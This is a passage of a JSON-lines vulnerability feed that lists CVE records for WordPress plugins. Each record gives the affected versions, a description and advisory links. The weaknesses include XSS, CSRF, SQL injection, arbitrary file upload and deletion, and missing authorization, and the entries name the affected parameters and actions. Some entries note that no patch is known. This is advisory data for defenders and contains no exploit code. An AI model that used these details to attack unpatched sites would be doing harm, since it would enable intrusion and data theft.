link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2417429\\\/ewww-image-optimizer\\\/trunk\\\/classes\\\/class-ewww-nextgen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2417429\\\/ewww-image-optimizer\\\/trunk\\\/classes\\\/class-ewww-nextgen.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef33e3c-187a-45d9-9dac-0895dce34216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef33e3c-187a-45d9-9dac-0895dce34216?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2995","slug":"leyka","versionImpact":"3.30.3","description":"The Leyka WordPress plugin through 3.30.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/762ff2ca-5c1f-49ae-b83c-1c22bacbc82f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/762ff2ca-5c1f-49ae-b83c-1c22bacbc82f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1536","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.9","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3642","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting subscriber, which could allow attackers to make logged in admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc44d85f-afe8-4824-95b0-11b9abfb04d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc44d85f-afe8-4824-95b0-11b9abfb04d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3230","slug":"download-attachments","versionImpact":"1.3","description":"The Download Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'download-attachments' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62475d8f-a0f6-45ab-abd0-ad24e1887c91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62475d8f-a0f6-45ab-abd0-ad24e1887c91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-attachments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-attachments\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3558","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the 'cfs[post_title]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e4dc6fd-4bd5-4ed1-ade0-cf2f8831fac3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e4dc6fd-4bd5-4ed1-ade0-cf2f8831fac3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/field_group.php#L20\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/field_group.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/form.php#L64\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/form.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/api.php#L282\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/api.php#L282\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPress\\\/WordPress\\\/blob\\\/22d95abc55824e83904dc0fef290464b6bec7708\\\/wp-admin\\\/includes\\\/template.php#L1384\",\"name\":\"https:\\\/\\\/github.com\\\/WordPress\\\/WordPress\\\/blob\\\/22d95abc55824e83904dc0fef290464b6bec7708\\\/wp-admin\\\/includes\\\/template.php#L1384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/core.trac.wordpress.org\\\/ticket\\\/56655\",\"name\":\"https:\\\/\\\/core.trac.wordpress.org\\\/ticket\\\/56655\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7257","slug":"yayextra","versionImpact":"1.3.7","description":"The YayExtra \u2013 WooCommerce Extra Product Options plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_upload_file function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/753a4f7a-7bd4-43a4-b8fb-9e982239ba0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/753a4f7a-7bd4-43a4-b8fb-9e982239ba0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yayextra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yayextra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129731\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129731\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9262","slug":"user-meta","versionImpact":"3.1","description":"The User Meta \u2013 User Profile Builder and User management plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.1 via the getUser() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to obtain user meta values from form fields. Please note that this requires a site administrator to create a form that displays potentially sensitive information like password hashes. This may also be exploited by unauthenticated users if the  'user-meta-public-profile' shortcode is used insecurely.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed81348-7604-4858-bc8e-b4504d77ee45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed81348-7604-4858-bc8e-b4504d77ee45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-meta\\\/trunk\\\/models\\\/classes\\\/generate\\\/PublicProfile.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-meta\\\/trunk\\\/models\\\/classes\\\/generate\\\/PublicProfile.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12731","slug":"aklamator-infeed","versionImpact":"2.0.0","description":"The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1c3754f-60e0-4a89-b4fc-89056dba3616\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1c3754f-60e0-4a89-b4fc-89056dba3616\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1560","slug":"wow-entrance-effects-wee","versionImpact":"0.1","description":"The WOW Entrance Effects (WEE!) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wee' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-entrance-effects-wee\\\/trunk\\\/wee.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-entrance-effects-wee\\\/trunk\\\/wee.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-entrance-effects-wee\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-entrance-effects-wee\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/423e840e-0bc2-4481-afff-61ace85788d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/423e840e-0bc2-4481-afff-61ace85788d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2004","slug":"simple-wp-events","versionImpact":"1.8.17","description":"The Simple WP Events plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wpe_delete_file AJAX action in all versions up to, and including, 1.8.17. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-wp-events\\\/trunk\\\/admin\\\/includes\\\/wp-events-export-events.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-wp-events\\\/trunk\\\/admin\\\/includes\\\/wp-events-export-events.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdca93e-f68d-4a96-8bd7-443ee46ccb5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdca93e-f68d-4a96-8bd7-443ee46ccb5a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4669","slug":"booking","versionImpact":"10.11.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpbc shortcode in all versions up to, and including, 10.11.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L789\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L789\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293836\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293836\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4e43d66-04f4-4adb-93da-75e02d1c714e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4e43d66-04f4-4adb-93da-75e02d1c714e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49974","slug":"upstream","versionImpact":"2.1.0","description":"Missing Authorization vulnerability in upstreamplugin UpStream: a Project Management Plugin for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects UpStream: a Project Management Plugin for WordPress: from n\/a through 2.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upstream\\\/vulnerability\\\/wordpress-upstream-a-project-management-plugin-for-wordpress-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upstream\\\/vulnerability\\\/wordpress-upstream-a-project-management-plugin-for-wordpress-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6054","slug":"yanewsflash","versionImpact":"1.0.3","description":"The YANewsflash plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'yanewsflash\/yanewsflash.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yanewsflash\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yanewsflash\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/171fe5db-0b43-47ba-b215-87ce9d7b5095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/171fe5db-0b43-47ba-b215-87ce9d7b5095?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2009","slug":"pretty-url ","versionImpact":"1.5.4","description":"Plugin does not sanitize and escape the URL field in the Pretty Url WordPress plugin through 1.5.4 settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7988a18-ba9d-4ead-82c8-30ea8223846f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7988a18-ba9d-4ead-82c8-30ea8223846f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2556","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the anonymous function for the wpcs_sd_delete action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete an arbitrary custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc44c95e-9ca0-46d0-8315-72612ef3f855?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc44c95e-9ca0-46d0-8315-72612ef3f855?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4427","slug":"free-comments-for-wordpress-vuukle","versionImpact":"3.4.31","description":"The Vuukle Comments, Reactions, Share Bar, Revenue plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.31. This is due to missing or incorrect nonce validation in the \/admin\/partials\/free-comments-for-wordpress-vuukle-admin-display.php file. This makes it possible for unauthenticated attackers to edit the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff28f33f-85d1-4987-975b-ee3bbcb394f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff28f33f-85d1-4987-975b-ee3bbcb394f4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2553337%40free-comments-for-wordpress-vuukle&new=2553337%40free-comments-for-wordpress-vuukle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2553337%40free-comments-for-wordpress-vuukle&new=2553337%40free-comments-for-wordpress-vuukle&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5063","slug":"youtube-widget-responsive","versionImpact":"1.6.1","description":"The Widget Responsive for Youtube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'youtube' shortcode in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72daa533-8b17-420c-9b51-b5f72da2726c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72daa533-8b17-420c-9b51-b5f72da2726c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-widget-responsive\\\/trunk\\\/youtube-widget-responsive.php?rev=2905626#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-widget-responsive\\\/trunk\\\/youtube-widget-responsive.php?rev=2905626#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968766\\\/youtube-widget-responsive#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968766\\\/youtube-widget-responsive#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1698","slug":"notificationx","versionImpact":"2.8.2","description":"The NotificationX \u2013 Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Database.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Database.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Rest\\\/Analytics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Rest\\\/Analytics.php\",\"refsource\":\"\",\"tags\":[]}]"}
